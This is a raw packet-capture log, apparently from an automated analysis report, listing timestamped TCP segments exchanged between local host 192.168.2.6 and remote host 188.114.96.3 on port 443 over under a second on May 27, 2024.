        May 27, 2024 15:21:11.998867989 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:11.998878002 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:11.998883009 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:11.998915911 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:11.998935938 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:11.998939991 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:11.998976946 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:11.999000072 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:11.999005079 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:11.999037981 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:11.999061108 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:11.999062061 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:11.999078035 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:11.999125004 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:11.999134064 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:11.999183893 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.082597017 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.082753897 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.082847118 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.082854986 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.082865000 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.082914114 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.082918882 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.082954884 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.082982063 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.083435059 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.083498955 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.083507061 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.083558083 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.083862066 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.083933115 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.083992004 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.084050894 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.085225105 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.085293055 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.085325956 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.085376978 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.085387945 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.085405111 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.085442066 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.085779905 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.085813999 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.085844040 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.085850000 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.085884094 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.086647987 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.086711884 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.086713076 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.086720943 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.086771965 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.087517977 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.087582111 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.235295057 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.235377073 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.235486031 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.235500097 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.235538960 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.235548019 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.236476898 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.236543894 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.236639023 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.236675978 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.236701012 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.236706018 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.236716032 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.236844063 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.236898899 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.236905098 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.236948013 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.236952066 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.236962080 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.237003088 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.237498045 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.237555981 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.237768888 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.237826109 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.237874985 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.237931967 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.239264965 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.239326000 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.239582062 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.239628077 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.239639997 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.239650965 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.239670992 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.239682913 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.239732981 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.239737988 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.239794016 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.239799976 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.239804029 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.239850998 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.239921093 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.239979982 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.240022898 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.240080118 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.240123034 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.240176916 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.240714073 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.240783930 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.240818977 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.240878105 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.240983963 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.241054058 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.344299078 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.344341993 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.344372988 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.344409943 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.344417095 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.344480038 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.344490051 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.344521999 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.344544888 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.344549894 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.344588041 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.345457077 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.345500946 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.345530987 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.345536947 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.345568895 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.345592022 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.346103907 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.346121073 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.346188068 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.346191883 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.346237898 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.346486092 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.346498966 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.346561909 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.346566916 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.346605062 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.346930981 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.346945047 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.347007990 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.347013950 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.347058058 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.347259045 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.347273111 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.347332954 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.347337961 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.347378969 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.347634077 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.347647905 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.347708941 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.347713947 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.347759008 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.432797909 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.432818890 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.432943106 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.432950974 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.433000088 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.433511019 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.433526039 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.433592081 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.433598042 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.433654070 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.434341908 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.434356928 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.434431076 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.434437037 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.434485912 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.435306072 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.435322046 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.435384989 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.435390949 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.435436010 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.439157963 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.439173937 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.439245939 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.439253092 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.439296961 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.439810038 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.439826012 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.439887047 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.439893007 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.439932108 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.440597057 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.440613031 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.440673113 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.440677881 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.440721035 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.441562891 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.441577911 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.441637039 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.441643000 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.441684008 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.522655010 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.522681952 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.522763014 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.522789001 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.522851944 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.523211956 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.523243904 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.523278952 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.523283958 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.523319960 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.523348093 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.523648977 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.523665905 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.523793936 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.523813963 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.523871899 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.523933887 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.523947954 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.524012089 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.524017096 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.524091005 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.524662971 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.524681091 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.524745941 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.524749994 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.524801970 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.525049925 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.525063992 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.525130987 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.525135994 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.525185108 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.525872946 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.525887966 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.525949955 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.525954962 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.526024103 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.526547909 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.526562929 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.526623011 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.526628971 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.526675940 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.613266945 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.613289118 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.613374949 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.613384008 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.613436937 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.613779068 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.613794088 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.613863945 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.613869905 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.613914967 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.614317894 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.614331961 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.614401102 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.614404917 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.614449024 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.614752054 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.614768028 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.614828110 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.614833117 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.614876032 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.615469933 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.615483999 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.615547895 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.615552902 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.615596056 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.615911007 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.615925074 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.615987062 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.615992069 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.616033077 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.616468906 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.616483927 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.616542101 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.616547108 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.616599083 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.616923094 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.616945028 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.617005110 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.617012024 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.617053986 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.705591917 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.705610991 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.705847979 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.705856085 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.705915928 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.705919027 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.705930948 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.705960989 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.705985069 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.705992937 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.706032991 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.706053019 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.706223965 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.706238031 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.706306934 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.706311941 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.706361055 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.706598997 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.706613064 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.706676960 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.706681013 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.706727028 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.707150936 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.707165003 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.707225084 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.707228899 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.707278013 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.707571030 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.707583904 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.707648993 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.707653999 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.707703114 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.707914114 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.707927942 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.707986116 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.707992077 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.708034992 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.708388090 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.708400965 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.708463907 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.708468914 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.708511114 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.795701981 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.795721054 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.795804024 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.795814037 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.795864105 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.796051979 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.796071053 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.796133995 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.796139002 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.796185970 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.796526909 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.796540022 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.796602964 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.796607971 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.796648026 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.797053099 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.797066927 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.797130108 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.797136068 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.797187090 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.797939062 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.797951937 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.798018932 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.798023939 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.798067093 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.798326015 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.798338890 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.798403978 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.798408031 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.798449993 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.799526930 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.799546957 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.799618006 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.799629927 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.799673080 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.799909115 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.799921989 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.799981117 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.799987078 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.800029039 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.886667013 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.886691093 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.886883974 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.886996031 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.886996031 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.887012005 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.887088060 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.887343884 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.887360096 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.887434006 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.887439966 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.887882948 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.887901068 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.887965918 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.887972116 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.888345003 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.888360023 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.888418913 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.888427019 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.888835907 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.888854027 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.888919115 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.888926029 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.889925003 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.889939070 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.890003920 CEST49713443192.168.2.6188.114.96.3
